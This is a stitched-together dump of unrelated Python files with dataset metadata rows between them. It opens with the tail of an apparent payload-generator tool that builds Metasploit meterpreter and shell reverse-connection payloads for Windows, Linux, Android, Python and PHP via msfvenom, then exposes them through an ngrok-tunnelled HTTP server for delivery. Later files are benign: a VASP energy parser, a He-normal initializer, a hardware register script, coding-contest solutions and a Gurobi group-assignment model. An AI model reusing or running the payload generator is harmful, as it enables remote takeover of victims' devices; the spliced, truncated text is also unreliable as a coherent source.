os.system('cd output/ && python -m SimpleHTTPServer 80')
def ngrok():
head()
try:
os.system('./ngrok http 80 > /dev/null &')
sleep(5)
os.system('curl -s -N http://127.0.0.1:4040/status | grep "http://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
sleep(5)
url = open('ngrok.url', 'r')
print('\nNgrok Url:{0} ' + url.read() + '{1}').format(cyan, end)
os.system('cd output/ && python -m SimpleHTTPServer 80 &')
sleep(5)
raw_input('Hit {0}(Return){1} to stop the server and return back to Main Menu'.format(bold, end))
os.system('pkill -f "python -m SimpleHTTPServer 80"')
os.system('pkill -f ngrok')
url.close()
choosepayload()
except KeyboardInterrupt:
os.system('pkill -f "python -m SimpleHTTPServer 80"')
os.system('pkill -f ngrok')
finish()
def main(platform, type):
lhost = raw_input("\nEnter your LHOST\n{0}{1}SPG:~/LHOST#{2} ".format(green, bold, end))
lport = raw_input("\nEnter your LPORT\n{0}{1}SPG:~/LPORT#{2} ".format(green, bold, end))
output = raw_input("\nEnter the name of output file\n{0}{1}SPG:~/output#{2} ".format(green, bold, end))
#Windows
if platform == 'Windows' and type == '1':
payload= 'windows/meterpreter/reverse_http'
format= 'exe'
extension= '.exe'
if platform == 'Windows' and type == '2':
payload= 'windows/meterpreter/reverse_https'
format= 'exe'
extension= '.exe'
if platform == 'Windows' and type == '3':
payload= 'windows/meterpreter/reverse_tcp'
format= 'exe'
extension= '.exe'
#linux
if platform == 'Linux' and type == '1':
payload= 'linux/x86/shell/reverse_tcp'
format= 'elf'
extension= '.elf'
if platform == 'Linux' and type == '2':
payload= 'linux/x86/meterpreter/reverse_tcp'
format= 'elf'
extension= '.elf'
#Android
elif platform == 'Android' and type == '1':
payload= 'android/meterpreter/reverse_http'
format= 'raw'
extension= '.apk'
elif platform == 'Android' and type == '2':
payload= 'android/meterpreter/reverse_https'
format= 'raw'
extension= '.apk'
elif platform == 'Android' and type == '3':
payload= 'android/meterpreter/reverse_tcp'
format= 'raw'
extension= '.apk'
#Python
elif platform == 'Python' and type == '1':
payload= 'python/meterpreter/reverse_http'
format= 'raw'
extension= '.py'
elif platform == 'Python' and type == '2':
payload= 'python/meterpreter/reverse_https'
format= 'raw'
extension= '.py'
elif platform == 'Python' and type == '3':
payload= 'python/meterpreter/reverse_tcp'
format= 'raw'
extension= '.py'
#PHP
elif platform == 'PHP' and type == '1':
payload= 'php/meterpreter/reverse_tcp'
format= 'raw'
extension= '.php'
os.system('msfvenom -p '+payload+' LHOST='+lhost+' LPORT='+lport+' -f'+format+' -o output/'+output+extension)
sleep(3)
if os.path.isfile('output/'+output+extension) == False:
head()
raw_input('{2}Failed to create payload, please try again.{1} {0}(Hit Enter to continue){1}'.format(bold, end, red))
choosepayload()
else:
def server_start():
head()
http_server = raw_input('Your payload has been sucessfully generated in the output directory. Do you want to start Ngrok server now ? {1}(y/n){2}\n{0}{1}SPG:~#{2} '.format(green, bold, end))
if http_server == 'y' or http_server == 'Y':
ngrok()
elif http_server == 'n' or http_server == 'N':
choosepayload()
else:
raw_input('Please Choose a Valid option {0}(Hit Return to continue){1}'.format(bold, end))
server_start()
server_start()
def choosepayload():
head()
select = raw_input('{2}Choose a payload platform:{1}\n\n{0}[{1}1{0}]{1} Windows\n{0}[{1}2{0}]{1} Linux\n{0}[{1}3{0}]{1} Android\n{0}[{1}4{0}]{1} Python\n{0}[{1}5{0}]{1} PHP\n{0}[{1}6{0}]{1} Start Ngrok Server\n{0}[{1}0{0}]{1} Exit\n\n{0}{2}SPG:~#{1} '.format(green, end, bold))
if select == '1':
head()
type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} windows/meterpreter/reverse_http\n{0}[{1}2{0}]{1} windows/meterpreter/reverse_https\n{0}[{1}3{0}]{1} windows/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Windows#{1} '.format(green, end, bold))
if type == '0':
choosepayload()
main('Windows', type)
elif select == '2':
head()
type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} linux/x86/shell/reverse_tcp\n{0}[{1}2{0}]{1} linux/x86/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Linux#{1} '.format(green, end, bold))
if type == '0':
choosepayload()
main('Linux', type)
elif select == '3':
head()
type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} android/meterpreter/reverse_http\n{0}[{1}2{0}]{1} android/meterpreter/reverse_https\n{0}[{1}3{0}]{1} android/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Android#{1} '.format(green, end, bold))
if type == '0':
choosepayload()
main('Android', type)
elif select == '4':
head()
type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} python/meterpreter/reverse_http\n{0}[{1}2{0}]{1} python/meterpreter/reverse_https\n{0}[{1}3{0}]{1} python/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Python#{1} '.format(green, end, bold))
if type == '0':
choosepayload()
main('Python', type)
elif select == '5':
head()
type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} php/meterprter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/PHP#{1} '.format(green, end, bold))
if type == '0':
choosepayload()
main('PHP', type)
elif select == '6':
ngrok()
elif select == '0':
finish()
else:
head()
print('{0}Please choose a valid option.{1}').format(red, end)
sleep(2)
choosepayload()
if __name__ == "__main__":
try:
head()
disclaimer()
present()
choosepayload()
except KeyboardInterrupt:
finish()
| true |
fb1a75f9e7d590fd20bec1889ea127ce5c9b3292 | Python | tdengg/pylastic | /.local/lib/python2.7/site-packages/pylastic/get_DFTdata.py | UTF-8 | 2,335 | 2.90625 | 3 | [] | no_license | """Get data from DFT calculations.
"""
import lxml.etree as et
class VASP(object):
"""VASP interface for collecting energies from vasprun.xml.
"""
def __init__(self):
self.__vfile = None
self.__cellsize = 1
self.__ERange = (-3000.,-1000.)
##
def set_outfile(self, vfile):
self.__vfile = vfile
self.__vasprun = et.parse(self.__vfile)
def get_outfile(self):
return self.__vasprun
##
def set_gsEnergy(self):
"""Get groundstate energy from vasprun.xml"""
elem = self.__vasprun.xpath("//scstep[last()]/energy/i[@name = 'e_fr_energy']")
self.__gsEnergy = float(elem[0].text)
#####################################
def set_cellsize(self, cells):
"""Set supercell size.
Parameters
----------
cells : integer
Number of atoms in the supercell.
"""
self.__cellsize = cells
def get_cellsize(self):
return self.__cellsize
def set_ERange(self, ERange):
"""Set expected energy range to filter VASP output.
Parameters
----------
ERange : tuple (emin,emax)
Energy range
"""
self.__ERange = ERange
def set_gsEnergy_DFPT(self):
"""Compensate for VASP's messy output"""
elem = self.__vasprun.xpath("//scstep/energy/i[@name = 'e_fr_energy']")
allengys = []
for k in elem:
try:
allengys.append(float(k.text))
except:
allengys.append(0.)
trueengys = []
for engy in allengys:
if engy < self.__ERange[1] and engy > self.__ERange[0]: trueengys.append(engy)
self.__gsEnergy = trueengys[-1]/self.__cellsize
####################################
def get_gsEnergy(self):
return self.__gsEnergy
##
def set_freeEnergy(self, T):
"""Process PHONOPY free energy output
Parameters
----------
T : float
Temperature
"""
g = open(self.__vfile)
self.__freeEnergy = float(g.readlines()[T].split()[1])/96.47244
g.close()
def get_freeEnergy(self):
return self.__freeEnergy
## | true |
a00c206ec5552c48fc5fd01f5ce34f471f4f89ee | Python | db3124/bigdata_maestro | /Python/myPyCode/chap06/write1.py | UTF-8 | 518 | 3.546875 | 4 | [] | no_license | import os
# 운영체제 관련 기능 제공하는 모듈
# get current working directory
os.getcwd()
# try 영역에서 오류가 발생할 때만 except 영역이 실행됨.
try:
fileName = input('파일명을 입력하세요: ')
f = open(fileName, 'rt') # 'wt'
except:
f = open('myFile.txt', 'a')
# 텍스트 파일로 기록할 때 한 줄이 끝났을 때 반드시 개행을 하라!!!
str1 = 'This is my third file.\n'
f.write(str1)
# 파일이 닫히면 파일 객체 f도 사라짐.
f.close()
| true |
dc69614edac2e183377a10ba9cafa05ee3316049 | Python | Pduhard/mlp_42 | /protodeep/Protodeep/initializers/HeNormal.py | UTF-8 | 312 | 2.5625 | 3 | [] | no_license | import numpy as np
from Protodeep.initializers.Initializer import Initializer
class HeNormal(Initializer):
"""
He Normal initializer
[0 - sqrt(2 / nout)]
"""
def initialize(self, shape, dtype=None, *args, **kwargs):
return np.random.randn(*shape) * np.sqrt(2 / shape[-1])
| true |
09f9fe0dc39786f45638775ac23c38b84db59161 | Python | ivovtin/workMTD | /scripts/example/read_write_single_register.py | UTF-8 | 1,868 | 2.96875 | 3 | [] | no_license | #!/bin/env python
import random # For randint
import sys # For sys.argv and sys.exit
import uhal
if __name__ == '__main__':
# PART 1: Argument parsing
if len(sys.argv) != 4:
print "Incorrect usage!"
print "usage: read_write_single_register.py <path_to_connection_file> <connection_id> <register_name>"
sys.exit(1)
connectionFilePath = sys.argv[1];
deviceId = sys.argv[2];
registerName = sys.argv[3];
# PART 2: Creating the HwInterface
connectionMgr = uhal.ConnectionManager("file://" + connectionFilePath);
hw = connectionMgr.getDevice(deviceId);
node = hw.getNode(registerName)
#for x in range(100000):
for x in range(2):
print(x)
# PART 3: Reading from the register
print "Reading from register '" + registerName + "' ..."
reg = node.read();
# dispatch method sends read request to hardware, and waits for result to return
# N.B. Before dispatch, reg.valid() == false, and reg.value() will throw
hw.dispatch();
print "... success!"
print "Value =", hex(reg)
print "Value =", reg
# PART 4: Writing (random value) to the register
print "Writing random value to register '" + registerName + "' ..."
#node.write(random.randint(0, 0xffffffff));
node.write(10);
# N.B. Depending on how many transactions are already queued, this write request may either be sent to the board during the write method, or when the dispatch method is called
hw.dispatch();
# In case there are any problems with the transaction, an exception will be thrown from the dispatch method
# Alternatively, if you want to check whether an individual write succeeded or failed, you can call the 'valid()' method of the uhal::ValHeader object that is returned by the write method
print "... success!"
| true |
1c355979c4cc1542d15514ea780e3f101b928f46 | Python | tientheshy/leetcode-solutions | /src/221.maximal-square.py | UTF-8 | 945 | 3.25 | 3 | [] | no_license | #
# @lc app=leetcode id=221 lang=python3
#
# [221] Maximal Square
#
# @lc code=start
# TAGS: Array, Dynamic Programming
# REVIEWME: similar to 1277
class Solution:
# 184 ms, 97.47%. O(M*N) Similar to best solution.
# The idea is very simple, it is a greedy approach by calculating the tail based on the cells it depends on to make a square
def maximalSquare(self, matrix: List[List[str]]) -> int:
if not matrix or not matrix[0]: return 0
matrix = [[1 if c == '1' else 0 for c in row] for row in matrix]
R, C = len(matrix), len(matrix[0])
# Calculate tail.
for r in range(1, R):
for c in range(1, C):
if matrix[r][c]:
matrix[r][c] = min(matrix[r - 1][c], matrix[r][c - 1], matrix[r - 1][c - 1]) + 1
# Get max tail.
mx = max(v for row in matrix for v in row)
return mx ** 2
# @lc code=end
| true |
5425e1aaf8bc7d4e48785da568cb5cbd43e0e552 | Python | viva0330/APS | /IM_study/0415/5201.py | UTF-8 | 2,138 | 3.453125 | 3 | [] | no_license | """
화물이 실려있는 N개의 컨테이너를 M대의 트럭으로 A도시에서 B도시로 운반.
트럭당 한개의 컨테이너 운반. 적재용량 초과 컨테이너 운반 불가.
A->B 최대 M개의 트럭이 편도로 한 번 만 운행한다고 한다.
총 증량이 최대가 되도록 컨테이너를 옮겼다면 옮겨진 화물의 전체 무게가 얼마인지,,?
화물을 싣지 못한 트럭이나 남는화물이 있을 수 있다. 컨테이너를 하나도 옮길 수 없는 경우
0 을 출력한다.
"""
"""
1. 적재 용량이 큰 트럭순으로 배열
2. 무거운 컨테이너 순으로 배열
3. 최선의 방법을 찾ㅇ는다.
3-1, 현재 기준으로 가장 무거운 컨테이너를 적재용량 큰 것에 넣기.
3-2 현재 기준을 변경한다.
그리디 알고리즘은 항상 옳은지 검증 후 사용!
ex) 1800
800원 거슬러주려고 한다.
500, 100, 50, 100
3-1 최선의 방법:
500 => 1
300원 남음
300 => 100자리 3개,,?
4개
만약에 동전이 400원짜리 동전이 있었다고 치자...!
이 경우에는 400원짜리 2개가 제일 적기 때문 ㅇㅇ,,!
"""
T = int(input())
for tc in range(1, T+1):
# N : 컨테이너 수, M : 트럭 수
N, M = map(int, input().split())
Mlist = list(map(int, input().split())) # 컨테이너 정보
Nlist = list(map(int, input().split())) # 트럭정보
Mlist.sort(reverse=True)
Nlist.sort(reverse=True)
# 누구를 기준으로 할건지
# 교수님은 트럭을 기준으로 (내가 따로 컨테이너를 기준으로 돌려보자!)
# 버리는 작업 위해 인덱스 잡아놓기..!
idx = 0
total = 0
for w in Mlist:
# 다시 돌리는 작업 필요
while idx < N and Nlist[idx] > w:
idx += 1
if idx < N-1:
total += Nlist[idx]
idx += 1
"""
while idx < N:
if Nlist[idx] > w:
idx += 1
else:
# 싣었다는 소리 위로 올라가는 작업!
total += Nlist[idx]
idx += 1
"""
| true |
9339637c0b6a04d28162faf78740fb5d6a1c2f23 | Python | NaomiBis/Python-week-3 | /bankstatement.py | UTF-8 | 1,356 | 4.09375 | 4 | [] | no_license | #A employee bank statement
#ask for user details
name=input("please enter name \n")
surname=input("please enter surname\n")
#ask for account number
acc_number= int(input("please enter account number \n"))
#ask for salary
salary=int(input("Enter your salary (R) \n"))
#variables to hold the tax, pension and new salary
tax_salary=0
new_salary=0
pension_savings=0
#tax calculation function
def tax():
tax_salary=((10/100)*(salary))
return tax_salary
#pension calculation function
def pension():
pension_savings=((15/100)*(salary))
return pension_savings
#new salary calculation function
def new_amount():
new_salary=salary-tax()-pension()
return new_salary
#display all details
print("*********Python Bank Statement**********")
print("#######################################")
print ("Name: \t \t \t",name)
print("Surname: \t \t",surname)
print("Account Number: \t",acc_number)
print("Account type:"+" \t \t Savings")
print("--------------------------------------------")
print("Your current salary: \t (R)", salary)
print("Your taxed amount: \t (R)", tax())
print("Your pension amount: \t (R)", pension())
print("-----------------------------------------")
print("Your current available amount: \t (R)",new_amount())
print("---------------THANK YOU------------------")
| true |
9dcc9c96cdfc9759e41ca965648743dfbfe11276 | Python | ccena/Learning-Basic-Python | /Chapter 2 Introduction to Numpy/2.8.3 More Advanced Compound Types.py | UTF-8 | 692 | 4.21875 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
It is possible to define even more advanced compound types. For example,
you can create a type where each element contains an array or matrix of values.
"""
import numpy as np
# Here, we’ll create a data type with a mat component consisting of a
# 3×3 floating-point matrix:
tp = np.dtype([('id', 'i8'), ('mat', 'f8', (3, 3))])
X = np.zeros(1, dtype=tp)
print(X[0])
print(X['mat'][0])
# Now each element in the X array consists of an id and a 3×3 matrix.
# If you find yourself writing a Python interface to a legacy C or Fortran
# library that manipulates structured data, you’ll probably find structured
# arrays quite useful! | true |
a0382171874c8167a54298ac554d88786f74a88f | Python | gokulsgr/virtual-drums | /main.py | UTF-8 | 7,747 | 2.6875 | 3 | [] | no_license | import cv2
import pygame
import numpy as np
from random import randint
class drum:
def __init__(self):
self.bpx, self.bpy = 0,0
self.rpx, self.rpy = 0,0
self.bnx, self.bny = 0,0
self.rnx, self.rny = 0,0
self.bip = False
self.rip= False
self.bi = False
self.ri = False
def redd(self):
hsv=cv2.cvtColor(self.img,cv2.COLOR_BGR2HSV)
red_lower=np.array([160, 100, 180],np.uint8)
red_upper=np.array([180, 255, 255],np.uint8)
mask=cv2.inRange(hsv,red_lower,red_upper)
kernel = np.ones((5,5),np.uint8)
opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)
ret, thresh = cv2.threshold(closing,127,255,0)
(_,contour,hierarchy)=cv2.findContours(thresh,1,2)
self.redcontours=contour
def bluee(self):
hsv=cv2.cvtColor(self.img,cv2.COLOR_BGR2HSV)
blue_lower=np.array([110,50,50],np.uint8)
blue_upper=np.array([130,255,255],np.uint8)
mask=cv2.inRange(hsv,blue_lower,blue_upper)
kernel = np.ones((5,5),np.uint8)
opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)
ret, thresh = cv2.threshold(closing,127,255,0)
(_,contours,hierarchy)=cv2.findContours(thresh,1,2)
self.bluecontours=contours
def bluecont(self):
try:
areas = self.bluecontours[0]
moment = cv2.moments(areas)
self.bnx = int(moment['m10']/moment['m00'])
self.bny = int(moment['m01']/moment['m00'])
radius, color, thickness = 15, (0,0,0), 4
cv2.circle(self.img,(self.bnx,self.bny),radius,color,thickness)
xComp = abs(self.bpx-self.bnx)
yComp = abs(self.bpy-self.bny)
speed=(xComp**2 + yComp**2)**0.5
self.bluesound(self.bnx,self.bny,speed)
except:
self.bi=False
def redcont(self):
try:
areas = self.redcontours[0]
moment = cv2.moments(areas)
self.rnx = int(moment['m10']/moment['m00'])
self.rny = int(moment['m01']/moment['m00'])
radius, color, thickness = 15, (0,0,255), 4
cv2.circle(self.img,(self.rnx,self.rny),radius,color,thickness)
xComp = abs(self.rpx-self.rnx)
yComp = abs(self.rpy-self.rny)
speed=(xComp**2 + yComp**2)**0.5
self.redsound(self.rnx,self.rny,speed)
except:
self.ri=False
def redsound(self,k1,k2,speed):
#k=(k1,k2)
if k1>130 and k1<180 and k2>470 and k2<530 and speed>10:
self.ri=True
if self.ri and not self.rip:
pygame.mixer.init()
pygame.mixer.music.load("sidedish.wav")
pygame.mixer.music.play()
if k1>270 and k1<330 and k2>570 and k2<630 and speed>10:
self.ri=True
if self.ri and not self.rip:
pygame.mixer.init()
pygame.mixer.music.load("bottomdrum.wav")
pygame.mixer.music.play()
if k1>430 and k1<700 and k2>570 and k2<630 and speed>10:
self.ri=True
if self.ri and not self.rip:
pygame.mixer.init()
pygame.mixer.music.load("tomtomdrum6.wav")
pygame.mixer.music.play()
if k1>570 and k1<630 and k2>570 and k2<630 and speed>10:
self.ri=True
if self.ri and not self.rip:
pygame.mixer.init()
pygame.mixer.music.load("tomtomdrum7.wav")
pygame.mixer.music.play()
if k1>730 and k1<770 and k2>570 and k2<630 and speed>10:
self.ri=True
if self.ri and not self.rip:
pygame.mixer.init()
pygame.mixer.music.load("sound1.mp3")
pygame.mixer.music.play()
if k1>870 and k1<930 and k2>470 and k2<530 and speed>10:
self.ri=True
if self.ri and not self.rip:
pygame.mixer.init()
pygame.mixer.music.load("cowbell9.wav")
pygame.mixer.music.play()
def bluesound(self,k1,k2,speed):
#k=(k1,k2)
if k1>130 and k1<180 and k2>470 and k2<530 and speed>10:
self.si=True
if self.si and not self.bip:
pygame.mixer.init()
pygame.mixer.music.load("sidedish.wav")
pygame.mixer.music.play()
if k1>270 and k1<330 and k2>570 and k2<630 and speed>10:
self.si=True
if self.si and not self.bip:
pygame.mixer.init()
pygame.mixer.music.load("bottomdrum.wav")
pygame.mixer.music.play()
if k1>430 and k1<700 and k2>570 and k2<630 and speed>10:
self.si=True
if self.si and not self.bip:
pygame.mixer.init()
pygame.mixer.music.load("tomtomdrum6.wav")
pygame.mixer.music.play()
if k1>570 and k1<630 and k2>570 and k2<630 and speed>10:
self.si=True
if self.si and not self.bip:
pygame.mixer.init()
pygame.mixer.music.load("tomtomdrum7.wav")
pygame.mixer.music.play()
if k1>730 and k1<770 and k2>570 and k2<630 and speed>10:
self.si=True
if self.si and not self.bip:
pygame.mixer.init()
pygame.mixer.music.load("sound1.mp3")
pygame.mixer.music.play()
if k1>870 and k1<930 and k2>470 and k2<530 and speed>10:
self.si=True
if self.si and not self.bip:
pygame.mixer.init()
pygame.mixer.music.load("cowbell9.wav")
pygame.mixer.music.play()
def play(self):
cap=cv2.VideoCapture(0)
while(1):
_,self.img=cap.read()
self.img = cv2.flip(self.img,1)
ratio = 1000.0 / self.img.shape[1]
dim = (1000, int(self.img.shape[0] * ratio))
self.img= cv2.resize(self.img,dim,interpolation = cv2.INTER_CUBIC)
self.redd()
self.bluee()
self.bluecont()
self.redcont()
self.bpx,self.bpy = self.bnx,self.bny
self.rpx,self.rpy= self.rnx,self.rny
self.bip= self.bi
self.rip = self.ri
b=randint(1,255)
g=randint(1,255)
r=randint(1,255)
cv2.circle(self.img,(150,500), 50, (b,g,r), -1)#sidedish
cv2.circle(self.img,(150,500), 20, (255,0,0), -1)#center
cv2.circle(self.img,(300,600), 50, (r,g,b), -1)#bootomdrum
cv2.circle(self.img,(300,600), 20, (255,0,0), -1)#center
cv2.circle(self.img,(450,600), 50, (g,b,r), -1)#tomd6
cv2.circle(self.img,(450,600), 20, (255,0,0), -1)#center
cv2.circle(self.img,(600,600), 50, (b,g,r), -1)#tom7
cv2.circle(self.img,(600,600), 20, (255,0,0), -1)#center
cv2.circle(self.img,(750,600), 50, (b,b,r), -1)#sound1
cv2.circle(self.img,(750,600), 20, (255,0,0), -1)#center
cv2.circle(self.img,(900,500), 50, (r,r,g), -1)#bell
cv2.circle(self.img,(900,500), 20, (255,0,0), -1)#center
cv2.imshow("sgr",self.img)
if cv2.waitKey(27)&0xFF==ord('q'):
cap.release()
cv2.destroyAllWindows()
break
obj=drum()
obj.play()
| true |
35ad92a65f05ab61128dcd068ddcfa949da38e9d | Python | gpleiss/ciq_experiments | /bayesopt/ciq_bo/utils.py | UTF-8 | 1,152 | 3.234375 | 3 | [
"Apache-2.0"
] | permissive | import torch
def to_unit_cube(x, lb, ub):
"""Project to [0, 1]^d from hypercube with bounds lb and ub"""
assert torch.all(lb < ub) and lb.ndim == 1 and ub.ndim == 1 and x.ndim == 2
xx = (x - lb) / (ub - lb)
return xx
def from_unit_cube(x, lb, ub):
"""Project from [0, 1]^d to hypercube with bounds lb and ub"""
assert torch.all(lb < ub) and lb.ndim == 1 and ub.ndim == 1 and x.ndim == 2
xx = x * (ub - lb) + lb
return xx
def standardize(y):
"""Standardize a 1-dimensional tensor."""
assert y.ndim == 1
return (y - y.mean()) / y.std()
def latin_hypercube(n_pts, dim, dtype=None, device=None):
"""Latin hypercube with center perturbation."""
X = torch.zeros(n_pts, dim, dtype=dtype, device=device)
centers = (1.0 + 2.0 * torch.arange(0.0, n_pts, dtype=dtype, device=device)) / float(2 * n_pts)
for i in range(dim): # Shuffle the center locataions for each dimension.
X[:, i] = centers[torch.randperm(n_pts)]
# Add some perturbations within each box
pert = (-1.0 + 2.0 * torch.rand(n_pts, dim, dtype=dtype, device=device)) / float(2 * n_pts)
X += pert
return X
| true |
cb4fc5a01d679d3142de24aa136aec4d5c106a49 | Python | philipmeneghini/Group_Optimization | /Group Optimization Code.py | UTF-8 | 6,361 | 2.734375 | 3 | [] | no_license | import gurobipy as gp
from gurobipy import GRB
import numpy as np
import pandas as pd
##initialize all data
names = ["Alex M.","Alex R.","Arjun","Brendan","Elisabeth","Emma","Erica","Evan","Hanna","Kalju","Khai","Lorene","Matthew","Maura",
"Maxwell","Nathan","Parker","Philip","Samuel","Sarah","Sejal","Yongzhi","Yongkai","Yuchen"]
numberofpeople = len(names)
skills_frame = pd.read_csv(r"C:\Users\philm\Documents\456\Group_Optimization\People's_Skills.csv")
preferences_frame = pd.read_csv(r"C:\Users\philm\Documents\456\Group_Optimization\People's_Project_Preferences.csv")
availability_frame = pd.read_csv(r"C:\Users\philm\Documents\456\Group_Optimization\People's_Availabilities.csv")
preferences_frame.drop(preferences_frame.columns[0], axis =1, inplace=True)
names_val= skills_frame["name"]
coding_val = skills_frame["Coding skills"]
writing_val = skills_frame["Writing skills"]
latex_val = skills_frame["Latex skills"]
present_val = skills_frame["Presentation skills"]
leader_val = skills_frame["Leadership skills"]
org_val = skills_frame["Organizational skills"]
time_val = skills_frame["Time management skills"]
#The dictionaries we want our data in
coding={}
writing ={}
latex ={}
presentation={}
leadership={}
organization={}
timemanagement ={}
preferences ={}
time={}
#Converting all our dictionary values to boolean values. If they rank themselves above a sux they are considered
#"proficient"
for i in range(0,24):
if coding_val[i] >6:
coding[names[i]]=1
else:
coding[names[i]]=0
if writing_val[i] >6:
writing[names[i]]=1
else:
writing[names[i]]=0
if latex_val[i] >6:
latex[names[i]]=1
else:
latex[names[i]]=0
if present_val[i] >6:
presentation[names[i]]=1
else:
presentation[names[i]]=0
if leader_val[i] >6:
leadership[names[i]]=1
else:
leadership[names[i]]=0
if org_val[i] >6:
organization[names[i]]=1
else:
organization[names[i]]=0
if time_val[i] >6:
timemanagement[names[i]]=1
else:
timemanagement[names[i]]=0
preferences[names[i]]=list()
temp = preferences_frame.iloc[i]
temp=temp.transpose()
for j in range(0,7):
preferences[names[i]].append(temp.iloc[j])
time[names[i]]= list()
temp2 = availability_frame.iloc[i]
temp2 =temp2.transpose()
for j in range(0,len(availability_frame.columns)):
time[names[i]].append(temp2.iloc[j])
##initialize all decision variables
m=gp.Model()
x = m.addVars(24,7,vtype=GRB.BINARY, name = "x")
y = m.addVars(7, vtype=GRB.BINARY, name = "y")
w= m.addVars(7, 168, vtype=GRB.BINARY, name = "w")
##Last variable represents how many restraints are broken
c = m.addVars(7, vtype = GRB.INTEGER, name ="c")
obj =0
for i in range(0,24):
for j in range(0,7):
obj=obj + int(preferences[names[i]][j])*x[i,j]
for k in range(0,7):
##Our objective function goes down as we break more of the constraints
obj=obj-c[k]
m.setObjective(obj, GRB.MAXIMIZE)
##Initialize Constraints
##Each student is assigned to one project
for i in range(0,24):
sum1=0
for j in range(0,7):
sum1 = sum1 + x[i,j]
m.addConstr(sum1 ==1)
##Student cannpot be assigned to project if it is not happening
for j in range(0,7):
sum2=0
for i in range(0,24):
sum2=sum2 + x[i,j]
##Add Constraints to keep three to four people to group
m.addConstr(sum2-4*y[j]<=0)
m.addConstr(sum2-3*y[j]>=0)
##Six or Seven Projects should happen
sum3=0
for j in range(0,7):
sum3=sum3 +y[j]
m.addConstr(sum3>= 6)
m.addConstr(sum3<=7)
##Every project needs at least one coder, presenter, writer, organizer, Latex expert, leader, and a person who is good at time management
##The matrix variable c serves as a way to mark if one of these constraints are not met and it penalizes the objective function.
for j in range(0,7):
sum4=0
sum5=0
sum6=0
sum7=0
sum8=0
sum9=0
sum10=0
for i in range(0,24):
sum4 = sum4 + coding[names[i]]*x[i,j]
sum5=sum5+ presentation[names[i]]*x[i,j]
sum6=sum6+ writing[names[i]]*x[i,j]
sum7 = sum7 + latex[names[i]]*x[i,j]
sum8=sum8+ leadership[names[i]]*x[i,j]
sum9=sum9 + organization[names[i]]*x[i,j]
sum10=sum10 + timemanagement[names[i]]*x[i,j]
m.addConstr(sum4+ c[j]>=y[j])
m.addConstr(sum5 + c[j]>=y[j])
m.addConstr(sum6+ c[j]>=y[j])
m.addConstr(sum7+c[j]>=y[j])
m.addConstr(sum8+ c[j]>=y[j])
m.addConstr(sum9+ c[j]>=y[j])
m.addConstr(sum10+ c[j]>=y[j])
m.addConstr(c[j]>=0)
##Time constraint is as follows
##We set w[j,h] to be binary so we want if group j can meet at hour h then we have a zero and a one otherwise
for j in range(0,7):
for h in range(0,168):
res1=0
res2=0
for i in range(0,24):
res1+= x[i,j]
res2+= time[names[i]][h]*x[i,j]
m.addConstr(w[j,h]<= res1-res2)
##This makes sure if one or more group mates cannot meet that there is a one in that entry
m.addConstr(w[j,h]>= (res1-res2)/4)
##Now making the actual time constraint that a group must have at least two hours where they can all meet
for j in range(0,7):
res3=0
for h in range(0,168):
res3+= w[j,h]
m.addConstr(res3<= 166*y[j])
##Now since we have all our constraints we can try to find the optimal groups
m.optimize()
##Now print out the groups
for j in range(0,7):
print("\nGroup "+ str(j) +": ")
for i in range(0,24):
if x[i,j].X == 1.0:
print(names[i]+", ")
if y[j].X==0:
print("project not happening")
else:
print("\nmeeting times: ")
for k in range(0,168):
if w[j,k].X== 0:
day=""
d= int(k/24)
if d == 0:
day="sunday"
if d == 1:
day="monday"
if d == 2:
day="tuesday"
if d == 3:
day="wednesday"
if d == 4:
day="thursday"
if d == 5:
day="friday"
if d == 6:
day="saturday"
hour = k%24
print("day: "+ day + " hour: "+ str(hour) + " (military)")
| true |
e2383486ce007ea0d84aa1aca8fadd58cc994ef5 | Python | mamemilk/acrc | /凡人が緑になるための精選50問_佐野/src/33.py | UTF-8 | 2,588 | 3.28125 | 3 | [] | no_license | # https://atcoder.jp/contests/abc177/tasks/abc177_d
#
# かなり苦労した.
#
# 友達グループA 1 2 3 4
# B 5 6
# C 7 8 9
# この場合,同じグループに友達が居ないグループの分け方は,4グループ.
# 最大のグループの要素数が答えになる.
# friendsをsetでもつ以下実装で,TLE 2件,WA 9件.TLEはわかるが,WAがなんでかがわかってない.
'''
N, M = map(int, input().split())
friends_set_by_id = list(range(N))
for m in range(M):
a,b = map(int, input().split())
if type(friends_set_by_id[a-1]) is int and type(friends_set_by_id[b-1]) is int:
friends_set_by_id[a-1] = set([a,b])
friends_set_by_id[b-1] = friends_set_by_id[a-1]
elif type(friends_set_by_id[b-1]) is int:
friends_set_by_id[a-1].add(b)
friends_set_by_id[b-1] = friends_set_by_id[a-1]
elif type(friends_set_by_id[a-1]) is int:
friends_set_by_id[b-1].add(a)
friends_set_by_id[a-1] = friends_set_by_id[b-1]
else:
tmp = friends_set_by_id[a-1] | friends_set_by_id[b-1]
friends_set_by_id[a-1] = tmp
friends_set_by_id[b-1] = tmp
#print(friends_set_by_id)
print(max([len(ele) if type(ele) is not int else 1 for ele in friends_set_by_id]))
'''
# テキストをカンニングしました.
class UnionFind:
def __init__( self, n):
self.n = n
self.parent_size =[- 1]* n
def merge( self, a, b):
x, y = self. leader( a), self. leader( b)
if x == y:
return
if abs( self.parent_size[ x])< abs( self.parent_size[ y]):
x, y = y, x
self. parent_size[ x] += self. parent_size[ y]
self. parent_size[ y]= x
return
def same( self, a, b):
return self. leader( a) == self. leader( b)
def leader( self, a):
if self. parent_size[ a]< 0:
return a
